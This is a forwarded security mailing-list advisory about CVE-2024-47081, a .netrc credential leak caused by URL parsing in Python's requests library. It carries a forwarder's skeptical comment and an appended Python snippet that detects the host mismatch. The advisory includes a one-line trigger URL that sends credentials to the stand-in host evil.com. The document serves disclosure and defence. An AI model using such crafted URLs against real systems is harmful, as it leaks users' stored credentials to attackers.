[I'm not sure how the attacker is supposed to get the victim to make a
 requests call using a URL the attacker controls, but that didn't stop
 them from getting a CVE issued for this. -alan- ]


-------- Forwarded Message --------
Subject: [FD] CVE-2024-47081: Netrc credential leak in PSF requests library
Date: Sat, 31 May 2025 06:30:50 +0000
From: Juho Forsén via Fulldisclosure <fulldisclos...@seclists.org>
Reply-To: Juho Forsén <jupe...@protonmail.ch>
To: fulldisclos...@seclists.org <fulldisclos...@seclists.org>

The PSF requests library (https://github.com/psf/requests & 
https://pypi.org/project/requests/) leaks .netrc credentials to third parties due 
to incorrect URL processing under specific conditions.

Issuing the following API call triggers the vulnerability:

  requests.get('http://example.com:@evil.com/')

Assuming .netrc credentials are configured for example.com, they are leaked to 
evil.com by the call.

The root cause is 
https://github.com/psf/requests/blob/c65c780849563c891f35ffc98d3198b71011c012/src/requests/utils.py#L240-L245

The vulnerability was originally reported to the library maintainers on 
September 12, 2024, but no fix is available. CVE-2024-47081 has been reserved 
by GitHub for this issue.

As a workaround, clients may explicitly specify the credentials used on every 
API call to disable .netrc access.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
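
The URL from the advisory above, worked through as an added example (not part of the original message and not code from requests). It assumes the netrc lookup host is taken by splitting the netloc on ':', which is an assumption about the linked lines the message does not quote; the function names and sample URLs are constructed for illustration.

```python
from urllib.parse import urlsplit


def naive_netrc_host(url):
    """Lookup host obtained by cutting the netloc at the first ':'.

    Assumed model of the flawed port stripping; userinfo is not removed first.
    """
    return urlsplit(url).netloc.split(":")[0]


def connection_host(url):
    """Host the request is actually sent to (userinfo and port removed)."""
    return urlsplit(url).hostname or ""


def netrc_host_mismatch(url):
    """True when userinfo in the URL makes the netrc lookup host differ
    from the host that receives the request."""
    netloc = urlsplit(url).netloc
    if "@" not in netloc:
        # No userinfo: only a port (or IPv6 literal) follows the host.
        return False
    return naive_netrc_host(url).lower() != connection_host(url).lower()


if __name__ == "__main__":
    # Constructed sample URLs; the first is the one quoted in the advisory.
    samples = [
        "http://example.com:@evil.com/",
        "http://example.com:8080/api",
        "http://[::1]:8080/",
    ]
    for url in samples:
        print(
            f"{url!r}: netrc lookup={naive_netrc_host(url)!r} "
            f"sent to={connection_host(url)!r} "
            f"mismatch={netrc_host_mismatch(url)}"
        )
```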